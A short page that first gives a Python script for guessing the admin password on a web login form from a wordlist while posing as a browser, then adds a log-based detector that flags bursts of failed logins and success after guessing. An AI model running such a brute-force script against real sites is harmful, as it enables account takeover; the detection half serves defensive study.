Password Guessing a Web Login Page

Simple code for attempting to guess the admin password on a web login form.

from requests import post

# Look like a real browser
HEADER = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"}

# Read in my password list
with open("passwords.txt") as fh:
    passwords = fh.readlines()

# Try to guess
for password in passwords:
    # Strip the trailing newline once so the POST data and the report match
    password = password.rstrip()
    post_data = {'user': 'admin', 'pass': password}
    response = post('https://website.com/loginpage.php', post_data, headers=HEADER)

    # This message could obviously change, depending on the site
    if 'The login is invalid.' not in response.text:
        print(f"Guessed! admin/{password}")
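
Because the script above sends a browser-like User-Agent, the signal a defender has left is the run of failed logins for one account from one source. The following is an added example, not code from the original page: a sliding-window detector over an application auth log. The log format, the sample lines, and the thresholds are constructed assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample auth log (hypothetical format, not from the page):
# ISO timestamp, source IP, username, result
SAMPLE_LOG = """\
2024-01-10T09:00:00 198.51.100.7 admin FAIL
2024-01-10T09:00:01 198.51.100.7 admin FAIL
2024-01-10T09:00:02 198.51.100.7 admin FAIL
2024-01-10T09:00:03 198.51.100.7 admin FAIL
2024-01-10T09:00:04 198.51.100.7 admin FAIL
2024-01-10T09:00:05 198.51.100.7 admin OK
2024-01-10T09:01:00 203.0.113.20 alice FAIL
2024-01-10T09:01:30 203.0.113.20 alice OK
2024-01-10T09:05:00 192.0.2.44 admin FAIL
2024-01-10T09:20:00 192.0.2.44 admin FAIL
"""

def detect_guessing(log_text, max_failures=5, window=timedelta(seconds=60)):
    """Alert when an (ip, user) pair reaches max_failures failed logins inside
    the window, and again if a success follows while the burst is still live."""
    recent = defaultdict(deque)   # (ip, user) -> timestamps of recent failures
    flagged = set()               # pairs already alerted for the current burst
    alerts = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue              # skip malformed lines
        stamp, ip, user, result = parts
        when = datetime.fromisoformat(stamp)
        key, fails = (ip, user), recent[(ip, user)]
        # Drop failures that have aged out of the sliding window
        while fails and when - fails[0] > window:
            fails.popleft()
        if result == "FAIL":
            fails.append(when)
            if len(fails) >= max_failures and key not in flagged:
                flagged.add(key)
                alerts.append(("password_guessing", ip, user, stamp))
        elif result == "OK":
            if len(fails) >= max_failures:
                alerts.append(("success_after_guessing", ip, user, stamp))
            fails.clear()         # a successful login resets the burst
            flagged.discard(key)
    return alerts

if __name__ == "__main__":
    for alert in detect_guessing(SAMPLE_LOG):
        print(alert)
```

A `success_after_guessing` alert means the account should be treated as compromised; a single mistyped password followed by a success (the `alice` lines) and slow, widely spaced failures do not trigger at these thresholds.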
